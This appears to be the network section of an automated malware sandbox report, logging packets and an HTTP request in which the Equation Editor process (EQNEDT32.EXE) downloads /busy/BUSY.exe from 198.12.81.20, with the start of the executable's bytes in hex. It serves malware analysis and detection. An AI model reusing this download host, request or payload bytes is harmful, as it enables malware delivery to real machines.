        May 13, 2022 16:42:02.691730976 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.801614046 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.801680088 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.801719904 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.801728964 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.801759958 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.801779032 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.801786900 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.801803112 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.801806927 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.801842928 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.801871061 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.801883936 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.801892996 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.801923037 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.801945925 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.801960945 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.801968098 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802000999 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802022934 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802038908 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802046061 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802078962 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802094936 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802118063 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802133083 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802158117 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802187920 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802196980 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802229881 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802234888 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802252054 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802279949 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802294016 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802319050 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802340031 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802359104 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802369118 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802397966 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802418947 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802438021 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802476883 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802479982 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802495003 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802517891 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802525997 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802556038 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802582979 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802596092 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802629948 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802634954 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802651882 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802674055 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802690029 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802712917 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802751064 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802773952 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802783966 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802791119 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802809954 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802830935 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802835941 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802869081 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802891016 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802910089 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802917957 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802951097 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802968025 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.802989006 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.802994967 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.803029060 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.803064108 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.803086996 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.805620909 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.805718899 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.805758953 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.805769920 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.805794954 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.805799961 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.805815935 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.805854082 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.807049036 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917064905 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917124987 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917166948 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917198896 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917203903 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917243958 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917248964 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917256117 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917260885 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917289019 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917305946 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917326927 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917347908 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917366982 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917382002 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917406082 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917418003 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917447090 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917463064 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917486906 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917499065 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917525053 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917538881 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917563915 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917577982 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917603970 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917614937 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917640924 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917661905 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917685986 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.917696953 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.917737007 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.920742035 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.920802116 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.920821905 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.920842886 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.920876026 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.920907021 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.920947075 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.920948982 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.920968056 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.920986891 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.920995951 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921027899 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921056986 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921068907 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921078920 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921108961 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921128035 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921149969 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921186924 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921190023 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921206951 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921226978 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921228886 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921268940 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921283960 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921308041 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921324968 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921353102 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921360970 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921394110 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921415091 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921431065 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921452999 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921472073 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921489000 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921513081 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921529055 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921550989 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921570063 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921591043 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921606064 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921629906 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921648979 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921669960 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921694040 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921710968 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921721935 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921750069 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921767950 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921788931 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921803951 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921829939 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921849012 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921868086 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921883106 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921907902 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921922922 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921947956 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921978951 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.921988010 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:02.921996117 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.922046900 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:02.923386097 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.031491041 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.031552076 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.031591892 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.031631947 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.031713009 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.031750917 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.031774998 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.031789064 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.031807899 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.031811953 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.031815052 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.031830072 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.031842947 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.031874895 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037303925 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037364006 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037404060 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037444115 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037482977 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037497044 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037518024 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037523031 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037556887 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037564993 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037590027 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037606001 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037626982 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037648916 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037673950 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037687063 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037703037 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037725925 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037731886 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037765980 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037792921 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037803888 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037821054 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037843943 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037854910 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037884951 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037900925 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037926912 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037930012 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.037967920 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.037997007 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038006067 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038019896 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038045883 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038049936 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038084984 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038110971 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038121939 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038139105 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038161993 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038170099 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038199902 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038224936 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038239956 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038254976 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038280964 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038288116 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038321972 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038352966 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038361073 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038377047 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038400888 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038413048 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038439035 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038470030 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038477898 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038499117 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038516998 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038531065 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038558006 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038574934 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038599014 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038604021 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038636923 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038666010 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038676977 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038693905 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038716078 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038727045 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038753986 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038774014 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038793087 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038805962 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038830042 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038851023 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038870096 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.038882017 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.038933039 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.041452885 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.149667978 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149713039 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149744034 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149772882 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149804115 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149821997 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.149836063 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149854898 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.149859905 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.149868011 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149879932 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.149899960 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149908066 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.149931908 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149935961 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.149960995 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.149981976 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.149995089 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.150003910 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.150026083 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.150031090 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.150058985 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.150073051 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.150091887 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.150095940 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.150122881 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.150141001 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.150154114 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.150163889 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.150188923 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.152518988 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152553082 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152584076 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152612925 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152631044 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.152642965 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.152642965 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152664900 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.152676105 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152690887 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.152707100 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152714968 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.152738094 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152749062 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.152769089 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152781010 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.152793884 CEST8049173198.12.81.20192.168.2.22
        May 13, 2022 16:42:03.152801037 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:03.152838945 CEST4917380192.168.2.22198.12.81.20
        May 13, 2022 16:42:07.008421898 CEST4917380192.168.2.22198.12.81.20
        • 198.12.81.20
        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.2249173198.12.81.2080C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        TimestampkBytes transferredDirectionData
        May 13, 2022 16:42:02.456495047 CEST2OUTGET /busy/BUSY.exe HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
        Host: 198.12.81.20
        Connection: Keep-Alive
        May 13, 2022 16:42:02.572757959 CEST3INHTTP/1.1 200 OK
        Date: Fri, 13 May 2022 14:42:02 GMT
        Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.0.17
        Last-Modified: Fri, 13 May 2022 11:21:13 GMT
        ETag: "3e719-5dee2df4306a6"
        Accept-Ranges: bytes
        Content-Length: 255769
        Keep-Alive: timeout=5, max=100
        Connection: Keep-Alive
        Content-Type: application/x-msdownload
        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 